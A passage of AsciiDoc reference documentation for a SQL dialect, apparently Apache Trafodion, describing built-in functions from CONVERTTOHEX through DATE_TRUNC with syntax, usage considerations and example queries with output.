VARCHAR(4), FC4U CHAR(4) CHARACTER SET UTF8);\r\n\r\nINSERT INTO EG_CH values('ABC', 'abc', _UTF8'abc');\r\n\r\nSELECT CONVERTTOHEX(FC4), CONVERTTOHEX(VC4), CONVERTTOHEX(FC4U) from EG_CH;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n-------- -------- ----------------\r\n41424320 616263 0061006200630020\r\n```\r\n\r\n* Display the internal values for a DATE column, a TIME column, a\r\nTIMESTAMP(2) column, and a TIMESTAMP(6) column:\r\n+\r\n```\r\nCREATE TABLE DT (D1 date, T1 time, TS1 timestamp(2), TS2 timestamp(6) );\r\nINSERT INTO DT values(current_date, current_time, current_timestamp, current_timestamp);\r\n\r\nSELECT CONVERTTOHEX(D1), CONVERTTOHEX(T1), CONVERTTOHEX(TS1), CONVERTTOHEX(TS2) from DT;\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR)\r\n----------- --------- ------------------------- -------------------------\r\n 07D8040F 0E201E 07D8040F0E201E00000035 07D8040F0E201E00081ABB\r\n```\r\n\r\n<<<\r\n* Display the internal values for an INTERVAL YEAR column, an INTERVAL\r\nYEAR(2) TO MONTH column, and an INTERVAL DAY TO SECOND column:\r\n+\r\n```\r\nCREATE TABLE IVT ( IV1 interval year, IV2 interval year(2) to month, IV3 interval day to second);\r\n\r\nINSERT INTO IVT values( interval '1' year, interval '3-2' year(2) to\r\nmonth, interval '31:14:59:58' day to second);\r\n\r\nSELECT CONVERTTOHEX(IV1), CONVERTTOHEX(IV2), CONVERTTOHEX(IV3) from IVT;\r\n\r\n(EXPR) (EXPR) (EXPR)\r\n------ -------- -----------------------\r\n 0001 0026 0000027C2F9CB780\r\n```\r\n\r\n<<<\r\n[[converttimestamp_function]]\r\n== CONVERTTIMESTAMP Function\r\n\r\nThe CONVERTTIMESTAMP function converts a Julian timestamp to a value\r\nwith data type TIMESTAMP.\r\n\r\nCONVERTTIMESTAMP is a {project-name} SQL extension.\r\n\r\n```\r\nCONVERTTIMESTAMP (julian-timestamp)\r\n```\r\n\r\n* `_julian-timestamp_`\r\n+\r\nis an expression that evaluates to a Julian timestamp, which is a\r\nLARGEINT value.\r\n\r\n[[considerations_for_converttimestamp]]\r\n=== Considerations for CONVERTTIMESTAMP\r\n\r\nThe _julian-timestamp_ value must be in the range from 14873163200000000\r\nto 274927348799999999.\r\n\r\n[[relationship_to_the_juliantimestamp_function]]\r\n==== Relationship to the 
JULIANTIMESTAMP Function\r\n\r\nThe operand of CONVERTTIMESTAMP is a Julian timestamp, and the function\r\nresult is a value of data type TIMESTAMP. The operand of the\r\nJULIANTIMESTAMP function is a value of data type TIMESTAMP, and the\r\nfunction result is a Julian timestamp. That is, the two functions have\r\nan inverse relationship to one another.\r\n\r\n[[use_of_converttimestamp]]\r\n==== Use of CONVERTTIMESTAMP\r\n\r\nYou can use the inverse relationship between the JULIANTIMESTAMP and\r\nCONVERTTIMESTAMP functions to insert Julian timestamp columns into your\r\ndatabase and display these column values in a TIMESTAMP format.\r\n\r\n<<<\r\n[[examples_of_converttimestamp]]\r\n=== Examples of CONVERTTIMESTAMP\r\n\r\n* Suppose that the EMPLOYEE table includes a column, named HIRE_DATE,\r\nwhich contains the hire date of each employee as a Julian timestamp.\r\nConvert the Julian timestamp into a TIMESTAMP value:\r\n+\r\n```\r\nSELECT CONVERTTIMESTAMP (hire_date) FROM persnl.employee;\r\n```\r\n\r\n* This example illustrates the inverse relationship between\r\nJULIANTIMESTAMP and CONVERTTIMESTAMP.\r\n+\r\n```\r\nSELECT CONVERTTIMESTAMP (JULIANTIMESTAMP (ship_timestamp)) FROM persnl.project;\r\n```\r\n+\r\nIf, for example, the value of SHIP_TIMESTAMP is 2008-04-03\r\n21:05:36.143000, the result of CONVERTTIMESTAMP(JULIANTIMESTAMP(ship_timestamp))\r\nis the same value, 2008-04-03 21:05:36.143000.\r\n\r\n<<<\r\n[[cos_function]]\r\n== COS Function\r\n\r\nThe COS function returns the cosine of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nCOS is a {project-name} SQL extension.\r\n\r\n```\r\nCOS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the COS function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_cos]]\r\n=== Examples of COS\r\n\r\n* This function returns the value 9.39680940386503680E-001, or\r\napproximately 0.9397, the cosine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nCOS (0.3491)\r\n```\r\n\r\n<<<\r\n[[cosh_function]]\r\n== COSH Function\r\n\r\nThe COSH function returns the hyperbolic cosine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nCOSH is a {project-name} SQL extension.\r\n\r\n```\r\nCOSH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the COSH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_cosh]]\r\n=== Examples of COSH\r\n\r\n* This function returns the value 1.88842387716101568E+000, or\r\napproximately 1.8884, the hyperbolic cosine of 1.25 in radians:\r\n+\r\n```\r\nCOSH (1.25)\r\n```\r\n\r\n<<<\r\n[[count_function]]\r\n== COUNT Function\r\n\r\nThe COUNT function counts the number of rows that result from a query or\r\nthe number of rows that contain a distinct value in a specific column.\r\nThe result of COUNT is data type LARGEINT. The result can never be NULL.\r\n\r\n```\r\nCOUNT {(*) | ([ALL | DISTINCT] expression)}\r\n```\r\n\r\n* `COUNT (*)`\r\n+\r\nreturns the number of rows in the table specified in the FROM clause of\r\nthe SELECT statement that contains COUNT (\\*). 
If the result table is\r\nempty (that is, no rows are returned by the query) COUNT (*) returns\r\nzero.\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nreturns the number of all rows or the number of distinct rows in the\r\none-column table derived from the evaluation of _expression_. The\r\ndefault option is ALL, which causes duplicate values to be included. If\r\nyou specify DISTINCT, duplicate values are eliminated before the COUNT\r\nfunction is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression that determines the values to count. The\r\n_expression_ cannot contain an aggregate function or a subquery. The\r\nDISTINCT clause specifies that the COUNT function operates on distinct\r\nvalues from the one-column table derived from the evaluation of\r\n_expression_. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_count]]\r\n=== Considerations for COUNT\r\n\r\n[[operands-of-the-expression-1]]\r\n==== Operands of the Expression\r\n\r\nThe operand of COUNT is either * or an expression that includes columns\r\nfrom the result table specified by the SELECT statement that contains\r\nCOUNT. However, the expression cannot include an aggregate function or a\r\nsubquery. These expressions are valid:\r\n\r\n```\r\nCOUNT (*)\r\nCOUNT (DISTINCT JOBCODE)\r\nCOUNT (UNIT_PRICE * QTY_ORDERED)\r\n```\r\n\r\n<<<\r\n[[count_nulls]]\r\n==== Nulls\r\n\r\nCOUNT is evaluated after eliminating all nulls from the one-column table\r\nspecified by the operand. If the table has no rows, COUNT returns zero.\r\n\r\nCOUNT(\\*) does not eliminate null rows from the table specified in the\r\nFROM clause of the SELECT statement. If all rows in a table are null,\r\nCOUNT(\\*) returns the number of rows in the table.\r\n\r\n[[examples_of_count]]\r\n=== Examples of COUNT\r\n\r\n* Count the number of rows in the EMPLOYEE table:\r\n+\r\n```\r\nSELECT COUNT (*) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 62\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Count the number of employees who have a job code in the EMPLOYEE\r\ntable:\r\n+\r\n```\r\nSELECT COUNT (jobcode) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 56\r\n\r\n--- 1 row(s) selected.\r\n\r\nSELECT COUNT(*)\r\nFROM persnl.employee\r\nWHERE jobcode IS NOT NULL;\r\n\r\n(EXPR)\r\n-----------\r\n 56\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Count the number of distinct departments in the EMPLOYEE table:\r\n+\r\n```\r\nSELECT COUNT (DISTINCT deptnum) FROM persnl.employee;\r\n\r\n(EXPR)\r\n-----------\r\n 11\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[crc32_function]]\r\n== CRC32 Function\r\n\r\nThe CRC32 function computes a cyclic redundancy check value and returns a 32-bit unsigned value.\r\nThe result is NULL if the argument is NULL. The argument is expected to be a\r\nstring and, if it is not, is treated as one where possible.\r\n\r\n```\r\nCRC32 (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies the value expression for which the checksum is computed. The\r\n_expression_ cannot contain an aggregate function or a subquery. 
See <<expressions,Expressions>>.\r\n\r\n[[examples_of_crc32]]\r\n=== Examples of CRC32\r\n\r\n```\r\n>>SELECT CRC32('Trafodion') from dual;\r\n\r\n(EXPR)\r\n----------\r\n1960931967\r\n\r\n>>SELECT CRC32(2016) from dual;\r\n\r\n(EXPR)\r\n----------\r\n2177070256\r\n```\r\n\r\n<<<\r\n[[current_function]]\r\n== CURRENT Function\r\n\r\nThe CURRENT function returns a value of type TIMESTAMP based on the\r\ncurrent local date and time.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nYou can also use <<current_timestamp_function,CURRENT_TIMESTAMP Function>>.\r\n\r\n```\r\nCURRENT [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 6.\r\n+\r\nFor example, the function CURRENT (2) returns the current date and time\r\nas a value of data type TIMESTAMP, where the precision of the fractional\r\nseconds is 2, for example, 2008-06-26 09:01:20.89. The value returned is\r\nnot a string value.\r\n\r\n[[examples_of_current]]\r\n=== Examples of CURRENT\r\n\r\n* The PROJECT table contains a column SHIP_TIMESTAMP of data type\r\nTIMESTAMP. Update a row by using the CURRENT value:\r\n+\r\n```\r\nUPDATE persnl.project\r\nSET ship_timestamp = CURRENT WHERE projcode = 1000;\r\n```\r\n\r\n<<<\r\n[[current_date_function]]\r\n== CURRENT_DATE Function\r\n\r\nThe CURRENT_DATE function returns the local current date as a value of\r\ntype DATE.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\n```\r\nCURRENT_DATE\r\n```\r\n\r\nThe CURRENT_DATE function returns the current date, such as 2008-09-28.\r\nThe value returned is a value of type DATE, not a string value.\r\n\r\n[[examples_of_current_date]]\r\n=== Examples of CURRENT_DATE\r\n\r\n* Select rows from the ORDERS table based on the current date:\r\n+\r\n```\r\nSELECT * FROM sales.orders\r\nWHERE deliv_date >= CURRENT_DATE;\r\n```\r\n\r\n* The PROJECT table has a column EST_COMPLETE of type INTERVAL DAY. If\r\nthe current date is the start date of your project, determine the\r\nestimated date of completion:\r\n+\r\n```\r\nSELECT projdesc, CURRENT_DATE + est_complete FROM persnl.project;\r\n\r\nProject\/Description (EXPR)\r\n------------------- ----------\r\nSALT LAKE CITY 2008-01-18\r\nROSS PRODUCTS 2008-02-02\r\nMONTANA TOOLS 2008-03-03\r\nAHAUS TOOL\/SUPPLY 2008-03-03\r\nTHE WORKS 2008-02-02\r\nTHE WORKS 2008-02-02\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[current_time_function]]\r\n== CURRENT_TIME Function\r\n\r\nThe CURRENT_TIME function returns the current local time as a value of\r\ntype TIME.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\n```\r\nCURRENT_TIME [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 0.\r\n+\r\nFor example, the function CURRENT_TIME (2) returns the current time as a\r\nvalue of data type TIME, where the precision of the fractional seconds\r\nis 2, for example, 14:01:59.30. 
The value returned is not a string\r\nvalue.\r\n\r\n[[examples_of_current_time]]\r\n=== Examples of CURRENT_TIME\r\n\r\n* Use CURRENT_DATE and CURRENT_TIME as a value in an inserted row:\r\n+\r\n```\r\nINSERT INTO stats.logfile (user_key, run_date, run_time, user_name)\r\nVALUES (001, CURRENT_DATE, CURRENT_TIME, 'JuBrock');\r\n```\r\n\r\n<<<\r\n[[current_timestamp_function]]\r\n== CURRENT_TIMESTAMP Function\r\n\r\nThe CURRENT_TIMESTAMP function returns a value of type TIMESTAMP based\r\non the current local date and time.\r\n\r\nThe function is evaluated once when the query starts execution and is\r\nnot reevaluated (even if it is a long running query).\r\n\r\nYou can also use the <<current_function,CURRENT Function>>.\r\n\r\n```\r\nCURRENT_TIMESTAMP [(precision)]\r\n```\r\n\r\n* `_precision_`\r\n+\r\nis an integer value in the range 0 to 6 that specifies the precision of\r\n(the number of decimal places in) the fractional seconds in the returned\r\nvalue. The default is 6.\r\n+\r\nFor example, the function CURRENT_TIMESTAMP (2) returns the current date\r\nand time as a value of data type TIMESTAMP, where the precision of the\r\nfractional seconds is 2; for example, 2008-06-26 09:01:20.89. The value\r\nreturned is not a string value.\r\n\r\n[[examples_of_current_timestamp]]\r\n=== Examples of CURRENT_TIMESTAMP\r\n\r\n* The PROJECT table contains a column SHIP_TIMESTAMP of data type\r\nTIMESTAMP. Update a row by using the CURRENT_TIMESTAMP value:\r\n+\r\n```\r\nUPDATE persnl.project\r\nSET ship_timestamp = CURRENT_TIMESTAMP WHERE projcode = 1000;\r\n```\r\n\r\n<<<\r\n[[current_user_function]]\r\n== CURRENT_USER Function\r\n\r\nThe CURRENT_USER function returns the database user name of the current\r\nuser who invoked the function. The current user is the authenticated\r\nuser who started the session. That database user name is used for\r\nauthorization of SQL statements in the current session.\r\n\r\n```\r\nCURRENT_USER\r\n```\r\n\r\nThe CURRENT_USER function is similar to the <<user_function,USER Function>>.\r\n\r\n[[considerations_for_current_user]]\r\n=== Considerations for CURRENT_USER\r\n\r\n* This function can be specified only in the top level of a SELECT statement.\r\n* The value returned is string data type VARCHAR(128) and is in ISO8859-1 encoding.\r\n\r\n[[examples_of_current_user]]\r\n=== Examples of CURRENT_USER\r\n\r\n* This example retrieves the database user name for the current user:\r\n+\r\n```\r\nSELECT CURRENT_USER FROM (values(1)) x(a);\r\n\r\n(EXPR)\r\n-----------------------\r\nTSHAW\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[date_add_function]]\r\n== DATE_ADD Function\r\n\r\nThe DATE_ADD function adds the interval specified by\r\n_interval_expression_ to _datetime_expr_. If the specified interval is\r\nin years or months, DATE_ADD normalizes the result. See\r\n<<standard_normalization,Standard Normalization>>. The type of the\r\n_datetime_expr_ is returned, unless the _interval_expression_ contains\r\nany time components, in which case a TIMESTAMP is returned.\r\n\r\nDATE_ADD is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_ADD (datetime-expr, interval-expression)\r\n```\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `_interval-expression_`\r\n+\r\nis an expression that can be combined in specific ways with addition\r\noperators. 
The _interval_expression_ accepts all interval expression\r\ntypes that the {project-name} database software considers as valid interval\r\nexpressions. See <<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_add]]\r\n=== Examples of DATE_ADD\r\n\r\n* This function returns the value DATE '2007-03-07'\r\n+\r\n```\r\nDATE_ADD(DATE '2007-02-28', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06'\r\n+\r\n```\r\nDATE_ADD(DATE '2008-02-28', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-03-07 00:00:00'\r\n+\r\n```\r\nDATE_ADD(timestamp'2008-02-29 00:00:00', INTERVAL '7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-02-28 23:59:59'\r\n+\r\n```\r\nDATE_ADD(timestamp '2007-02-28 23:59:59', INTERVAL '12' MONTH)\r\n```\r\n+\r\nNOTE: compare this example with the last example under DATE_SUB.\r\n\r\n<<<\r\n[[date_sub_function]]\r\n== DATE_SUB Function\r\n\r\nThe DATE_SUB function subtracts the specified _interval_expression_ from\r\n_datetime_expr_. If the specified interval is in years or months,\r\nDATE_SUB normalizes the result. See <<standard_normalization,Standard Normalization>>.\r\n\r\nThe type of the _datetime_expr_ is returned, unless the _interval_expression_ contains\r\nany time components, then a timestamp is returned.\r\n\r\nDATE_SUB is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_SUB (datetime-expr, interval-expression)\r\n```\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime_Value_Expression>>.\r\n\r\n* `_interval-expression_`\r\n+\r\nis an expression that can be combined in specific ways with subtraction\r\noperators. The _interval_expression_ accepts all interval expression\r\ntypes that the {project-name} database software considers as valid interval\r\nexpressions. see <<interval_value_expressions,Interval Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_date_sub]]\r\n=== Examples of DATE_SUB\r\n\r\n* This function returns the value DATE '2009-02-28'\r\n+\r\n```\r\nDATE_SUB(DATE '2009-03-07', INTERVAL'7' DAY)\r\n```\r\n\r\n* This function returns the value DATE '2008-02-29'\r\n+\r\n```\r\nDATE_SUB(DATE '2008-03-07', INTERVAL'7' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2008-02-29 00:00:00'\r\n+\r\n```\r\nDATE_SUB(timestamp '2008-03-31 00:00:00', INTERVAL '31' DAY)\r\n```\r\n\r\n* This function returns the timestamp '2007-02-28 23:59:59'\r\n+\r\n```\r\nDATE_SUB(timestamp '2008-02-29 23:59:59', INTERVAL '12' MONTH)\r\n```\r\n\r\n\r\n<<<\r\n[[dateadd_function]]\r\n== DATEADD Function\r\n\r\nThe DATEADD function adds the interval of time specified by _datepart_\r\nand _num-expr_ to _datetime-expr_. If the specified interval is in\r\nyears or months, DATEADD normalizes the result. See\r\n<<standard_normalization,Standard Normalization>>. 
The type of the\r\n_datetime-expr_ is returned, unless the interval expression contains any\r\ntime components, then a timestamp is returned.\r\n\r\nDATEADD is a {project-name} SQL extension.\r\n\r\n```\r\nDATEADD(datepart, num-expr, datetime-expr)\r\n```\r\n\r\n* `_datepart_`\r\n+\r\nis YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, QUARTER, WEEK, or one of the\r\nfollowing abbreviations:\r\n+\r\n[cols=\"15%,85%\"]\r\n|===\r\n| YEAR | _YY_ and _YYYY_\r\n| MONTH | _M_ and _MM_\r\n| DAY | _D_ and _DD_\r\n| HOUR | _HH_\r\n| MINUTE | _MI_ and _M_\r\n| SECOND | _SS_ and _S_\r\n| QUARTER | _Q_ and _QQ_\r\n| WEEK | _WW_ and _WK_\r\n|===\r\n\r\n\r\n* `_num-expr_`\r\n+\r\nis an SQL exact numeric value expression that specifies how many\r\n_datepart_ units of time are to be added to _datetime_expr_. If\r\n_num_expr_ has a fractional portion, it is ignored. If _num_expr_ is\r\nnegative, the return value precedes _datetime_expr_ by the specified\r\namount of time. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. The type of the _datetime_expression_ is returned, unless the\r\ninterval expression contains any time components, then a timestamp is\r\nreturned. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n<<<\r\n[[examples_of_dateadd]]\r\n=== Examples of DATEADD\r\n\r\n* This function adds seven days to the date specified in _start_date_\r\n+\r\n```\r\nDATEADD(DAY, 7,start_date)\r\n```\r\n\r\n* This function returns the value DATE '2009-03-07'\r\n+\r\n```\r\nDATEADD(DAY, 7 , DATE '2009-02-28')\r\n```\r\n\r\n* This function returns the value DATE '2008-03-06'\r\n+\r\n```\r\nDATEADD(DAY, 7, DATE '2008-02-28')\r\n```\r\n\r\n* This function returns the timestamp '2008-03-07 00:00:00'\r\n+\r\n```\r\nDATEADD(DAY, 7, timestamp'2008-02-29 00:00:00')\r\n```\r\n\r\n<<<\r\n[[datediff_function]]\r\n== DATEDIFF Function\r\n\r\nThe DATEDIFF function returns the integer value for the number of\r\n_datepart_ units of time between _startdate_ and _enddate_. If\r\n_enddate_ precedes _startdate_, the return value is negative or zero.\r\n\r\nDATEDIFF is a {project-name} SQL extension.\r\n\r\n```\r\nDATEDIFF (datepart, startdate, enddate)\r\n```\r\n\r\n* `datepart`\r\n+\r\nis YEAR, MONTH, DAY, HOUR, MINUTE, SECOND, QUARTER, WEEK, or one of the\r\nfollowing abbreviations:\r\n+\r\n[cols=\"15%,85%\"]\r\n|===\r\n| YEAR | _YY_ and _YYYY_\r\n| MONTH | _M_ and _MM_\r\n| DAY | _D_ and _DD_\r\n| HOUR | _HH_\r\n| MINUTE | _MI_ and _M_\r\n| SECOND | _SS_ and _S_\r\n| QUARTER | _Q_ and QQ\r\n| WEEK | _WW_ and _WK_\r\n|===\r\n\r\n* `startdate`\r\n+\r\nmay be of type DATE or TIMESTAMP.\r\nSee <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `enddate`\r\n+\r\nmay be of type DATE or TIMESTAMP.\r\nSee <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\nThe method of counting crossed boundaries such as days, minutes, and\r\nseconds makes the result given by DATEDIFF consistent across all data\r\ntypes. The result is a signed integer value equal to the number of\r\ndatepart boundaries crossed between the first and second date.\r\n\r\nFor example, the number of weeks between Sunday, January 4, and Sunday,\r\nJanuary 1 , is 1. The number of months between March 31 and April 1\r\nwould be 1 because the month boundary is crossed from March to April.\r\nThe DATEDIFF function generates an error if the result is out of range\r\nfor integer values. 
For seconds, the maximum number is equivalent to\r\napproximately 68 years. The DATEDIFF function generates an error if a\r\ndifference in weeks is requested and one of the two dates precedes\r\nJanuary 7 of the year 0001.\r\n\r\n<<<\r\n[[examples_of_datediff]]\r\n=== Examples of DATEDIFF\r\n\r\n* This function returns the value of 0 because no one-second boundaries\r\nare crossed.\r\n+\r\n```\r\nDATEDIFF( SECOND\r\n , TIMESTAMP '2006-09-12 11:59:58.999998'\r\n , TIMESTAMP '2006-09-12 11:59:58.999999'\r\n )\r\n```\r\n\r\n* This function returns the value 1 because a one-second boundary is\r\ncrossed even though the two timestamps differ by only one microsecond.\r\n+\r\n```\r\nDATEDIFF( SECOND\r\n , TIMESTAMP '2006-09-12 11:59:58.999999'\r\n , TIMESTAMP '2006-09-12 11:59:59.000000'\r\n )\r\n```\r\n\r\n* This function returns the value of 0.\r\n+\r\n```\r\nDATEDIFF( YEAR\r\n , TIMESTAMP '2006-12-31 23:59:59.999998'\r\n , TIMESTAMP '2006-12-31 23:59:59.999999'\r\n )\r\n```\r\n\r\n* This function returns the value of 1 because a year boundary is\r\ncrossed.\r\n+\r\n```\r\nDATEDIFF( YEAR\r\n , TIMESTAMP '2006-12-31 23:59:59.999999'\r\n , TIMESTAMP '2007-01-01 00:00:00.000000'\r\n )\r\n```\r\n\r\n* This function returns the value of 2 because two WEEK boundaries are\r\ncrossed.\r\n+\r\n```\r\nDATEDIFF(WEEK, DATE '2006-01-01', DATE '2006-01-09')\r\n```\r\n\r\n* This function returns the value of -29.\r\n+\r\n```\r\nDATEDIFF(DAY, DATE '2008-03-01', DATE '2008-02-01')\r\n```\r\n\r\n<<<\r\n[[dateformat_function]]\r\n=== DATEFORMAT Function\r\n\r\nThe DATEFORMAT function returns a datetime value as a character string\r\nliteral in the DEFAULT, USA, or EUROPEAN format. The data type of the\r\nresult is CHAR.\r\n\r\nDATEFORMAT is a {project-name} SQL extension.\r\n\r\n```\r\nDATEFORMAT (datetime-expression,{DEFAULT | USA | EUROPEAN})\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE, TIME,\r\nor TIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n* `DEFAULT | USA | EUROPEAN`\r\n+\r\nspecifies a format for a datetime value. See <<datetime_literals,Datetime Literals>>.\r\n\r\n[[considerations_for_dateformat]]\r\n=== Considerations for DATEFORMAT\r\n\r\nThe DATEFORMAT function returns the datetime value in ISO8859-1\r\nencoding.\r\n\r\n[[examples_of_dateformat]]\r\n=== Examples of DATEFORMAT\r\n\r\n* Convert a datetime literal in DEFAULT format to a string in USA\r\nformat: DATEFORMAT (TIMESTAMP '2008-06-20 14:20:20.00', USA) The\r\nfunction returns this string literal:\r\n+\r\n```\r\n'06\/20\/2008 02:20:20.00 PM'\r\n```\r\n\r\n* Convert a datetime literal in DEFAULT format to a string in European\r\nformat: DATEFORMAT (TIMESTAMP '2008-06-20 14:20:20.00', EUROPEAN) The\r\nfunction returns this string literal:\r\n+\r\n```\r\n'20.06.2008 14.20.20.00'\r\n```\r\n\r\n<<<\r\n[[date_part_function_of_an_interval]]\r\n== DATE_PART Function (of an Interval)\r\n\r\nThe DATE_PART function extracts the datetime field specified by _text_\r\nfrom the _interval_ value specified by _interval_ and returns the result\r\nas an exact numeric value. The DATE_PART function accepts the\r\nspecification of 'YEAR', 'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND'\r\nfor text.\r\n\r\nDATE_PART is a {project-name} SQL extension.\r\n\r\n```\r\nDATEPART (text, interval)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies YEAR, MONTH, DAY, HOUR, MINUTE, or SECOND. 
The value must be\r\nenclosed in single quotes.\r\n\r\n* `_interval_`\r\n+\r\n_interval_ accepts all interval expression types that the {project-name}\r\ndatabase software considers as valid interval expressions. See\r\n<<interval_value_expressions,Interval Value Expressions>>.\r\n\r\nThe DATE_PART(_text_, _interval_) is equivalent to EXTRACT(_text_,\r\n_interval_), except that the DATE_PART function requires single quotes\r\naround the text specification, where EXTRACT does not allow single\r\nquotes.\r\n\r\nWhen SECOND is specified the fractional part of the second is returned.\r\n\r\n[[examples_of_date_part]]\r\n=== Examples of DATE_PART\r\n\r\n* This function returns the value of 7.\r\n+\r\n```\r\nDATE_PART('DAY', INTERVAL '07:04' DAY TO HOUR)\r\n```\r\n\r\n* This function returns the value of 6.\r\n+\r\n```\r\nDATE_PART('MONTH', INTERVAL '6' MONTH)\r\n```\r\n\r\n* This function returns the value of 36.33.\r\n+\r\n```\r\nDATE_PART('SECOND', INTERVAL '5:2:15:36.33' DAY TO SECOND(2))\r\n```\r\n\r\n<<<\r\n[[date_part_function_of_a_timestamp]]\r\n== DATE_PART Function (of a Timestamp)\r\n\r\nThe DATE_PART function extracts the datetime field specified by _text_\r\nfrom the datetime value specified by _datetime_expr_ and returns the\r\nresult as an exact numeric value. The DATE_PART function accepts the\r\nspecification of 'YEAR', 'YEARQUARTER', 'YEARMONTH', 'YEARWEEK',\r\n'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND' for text.\r\n\r\nThe DATE_PART function of a timestamp can be changed to DATE_PART\r\nfunction of a datetime because the second argument can be either a\r\ntimestamp or a date expression.\r\n\r\nDATE_PART is a {project-name} extension.\r\n\r\n```\r\nDATEPART(text, datetime-expr)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies YEAR, YEARQUARTER, YEARMONTH, YEARWEEK, MONTH, DAY, HOUR,\r\nMINUTE, or SECOND. The value must be enclosed in single quotes.\r\n\r\n** *YEARMONTH*: Extracts the year and the month, as a 6-digit integer of\r\nthe form yyyymm (100 \\* year + month).\r\n** *YEARQUARTER*: Extracts the year and quarter, as a 5-digit integer of\r\nthe form yyyyq, (10 \\* year + quarter) with q being 1 for the first\r\nquarter, 2 for the second, and so on.\r\n** *YEARWEEK*: Extracts the year and week of the year, as a 6-digit integer\r\nof the form yyyyww (100 \\* year + week). The week number will be computed\r\nin the same way as in the WEEK function.\r\n\r\n* `_datetime-expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\nDATE_PART(_text_, _datetime-expr_) is mostly equivalent to\r\nEXTRACT(_text_, _datetime-expr_), except that DATE_PART requires\r\nsingle quotes around the text specification where EXTRACT does not allow\r\nsingle quotes. 
In addition, you cannot use the YEARQUARTER, YEARMONTH,\r\nand YEARWEEK text specification with EXTRACT.\r\n\r\n<<<\r\n[[examples_of_date_part]]\r\n=== Examples of DATE_PART\r\n\r\n* This function returns the value of 12.\r\n+\r\n```\r\nDATE_PART('month', date'12\/05\/2006')\r\n```\r\n\r\n* This function returns the value of 2006.\r\n+\r\n```\r\nDATE_PART('year', date'12\/05\/2006')\r\n```\r\n\r\n* This function returns the value of 31.\r\n+\r\n```\r\nDATE_PART('day', TIMESTAMP '2006-12-31 11:59:59.999999')\r\n```\r\n\r\n* This function returns the value 201 07.\r\n+\r\n```\r\nDATE_PART('YEARMONTH', date '2011-07-25')\r\n```\r\n\r\n<<<\r\n[[date_trunc_function]]\r\n== DATE_TRUNC Function\r\n\r\nThe DATE_TRUNC function returns a value of type TIMESTAMP, which has all\r\nfields of lesser precision than _text_ set to zero (or 1 in the case of\r\nmonths or days).\r\n\r\nDATE_TRUNC is a {project-name} SQL extension.\r\n\r\n```\r\nDATE_TRUNC(text, datetime-expr)\r\n```\r\n\r\n* `_text_`\r\n+\r\nspecifies 'YEAR', 'MONTH', 'DAY', 'HOUR', 'MINUTE', or 'SECOND'. The\r\nDATE_TRUNC function also accepts the specification of 'CENTURY' or 'DECADE'.\r\n\r\n* `_datetime_expr_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE 